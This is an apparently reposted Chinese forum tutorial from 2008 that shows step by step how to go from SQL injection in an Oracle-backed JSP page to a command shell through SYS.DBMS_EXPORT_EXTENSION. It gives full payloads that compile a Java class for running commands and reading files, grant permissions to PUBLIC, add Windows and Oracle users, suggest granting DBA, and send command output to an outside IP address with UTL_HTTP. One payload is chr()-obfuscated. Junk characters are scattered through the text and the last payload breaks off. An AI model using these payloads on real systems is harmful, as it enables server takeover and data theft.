实例演示oracle注入获取cmdshell的全过程

admin

以下的演示都是在web上的sql plus执行的，在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成

# Q! X6 D" H9 v! ^　　/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。(用" 'a'|| "是为了让语句返回true值)
语句有点长，可能要用post提交。
以下是各个步骤：
) O1 B' H( U3 s' o8 W- q( ]: x" @/ E1.创建包
2 [, \) Y2 z/ [3 q5 n( |/ `# D通过注入 SYS.DBMS_EXPORT_EXTENSION 函数，在oracle上创建Java包LinxUtil，里面两个函数，runCMD用于执行系统命令，readFile用于读取文件：
/xxx.jsp?id=1 and '1'<>'a'||(
: e6 L( I* U3 a0 b; t4 xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
+ w6 E1 ^# }1 |- V3 }, ~}'''';END;'';END;--','SYS',0,'1',0) from dual
6 F) l' i/ ]1 m: ^* v" o" l, _)
  {& B5 j9 Y0 t6 ~0 Y$ O9 O------------------------
$ h6 F- K$ j5 g# Y0 l8 q如果url有长度限制，可以把readFile()函数块去掉，即：
/xxx.jsp?id=1 and '1'<>'a'||(
& U: O4 }5 a2 `" Rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
; }% V0 n# _$ I" Hnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
4 b2 x  ]2 F% t7 d+ [: ?)
/ Q* f+ q5 H: `) \+ z同时把后面步骤 提到的 对readFile()的处理语句去掉。
# j7 H2 ]5 e7 ]. e5 ~0 n------------------------------
, h  i4 c8 }1 l7 k7 }! H2.赋Java权限
+ A+ M$ I  b! o; l0 J- C% Iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
* I0 A; s/ L0 P% y. P4 ]( _create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
3 s" W- p) T. |. i) l$ q4.赋public执行函数的权限
; A% h- I/ a/ Aselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
6 _. h7 ^4 U8 u9 B2 iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
/ H/ h7 z: a) S- K5.测试上面的几步是否成功
and '1'<>'11'||(
; s+ E6 G4 c  Q; Jselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
0 _5 k* `$ a# n  ~8 m3 band '1'<>(
; J) w7 m2 c' m2 c) l9 \select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)
5 L7 f6 L$ c0 l0 c$ ^/ `8 D  Y, z0 Z6 R$ `6.执行命令：
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
2 k" X; j0 F- R/ B
( X$ R  `# G; B)
! b4 e( H& V5 X; R5 i! n/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual

2 @# _' H- m$ L, Q)
　　
6 B9 i7 ^9 I7 `" K注意sys.LinxReadFile()返回的是varchar类型，不能用"and 1<>" 代替 "and '1'<>"。
& @$ i5 S. |* j( W& Y! ?如果要查看运行结果可以用 union :
0 b4 M3 c! u' Q: }. ]- e' A/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
% t" ]! H' {. e, u1 k! V# n或者UTL_HTTP.request(:
4 N1 l% V; j, q5 ]& ^2 ^+ @/ y/xxx.jsp?id=1 and '1'<>(
- H* X0 L( `6 r0 PSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
! B8 M( A6 `2 J- M, c; W* y' b6 t' D)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
1 r+ L" o2 a% O+ x1 p)
注意：用UTL_HTTP.request时，要用 REPLACE() 把空格、换行符给替换掉，否则会无法提交http request。用utl_encode.base64_encode也可以。
' b" q1 q: S/ D! X  r--------------------
6.内部变化
# W/ D: _5 ]* Z' E3 J通过以下命令可以查看all_objects表达改变：
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
7.删除我们创建的函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
% v8 H  V" C) k" s* v' C  ydrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
: P# H4 M6 X; ^6 R+ ]全文结束。谨以此文赠与我的朋友。
( C1 I/ v% o: z# x% zlinx
1 ?9 z% {$ F1 o% r124829445
2008.1.12
+ ?8 ~' ]% y2 s- F* H* m; U! Elinyujian@bjfu.edu.cn
======================================================================
) P$ Z8 v8 J2 g5 }5 z' Y/ `测试漏洞的另一方法：
创建oracle帐号：
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  [2 u! ]2 ^( k4 w. dCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
即：
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在：
1<>(
6 I% B. q/ U$ Z7 r. G2 W/ W  ~$ pselect user_id from all_users where username='LINXSQL'
* {' Q+ n8 V+ R$ u2 W5 n)
给linxsql连接权限：
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
; A5 x: T0 a5 w/ n+ [% v删除帐号：
1 U5 Q: `9 q* k' q( ~select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
. v- y6 }( I. Y) ^drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数Linx_query()，执行成功的话返回数值"1"，但权限是继承的，可能仅仅是public权限，作用似乎不大，真的要用到话可以考虑grant dba to 当前的User：
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
  ?! ~. }  e2 T% Q& O0 [: E) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
　)
' S. Z& p% H* o

$ y% h1 V/ _' y* h, e- b* O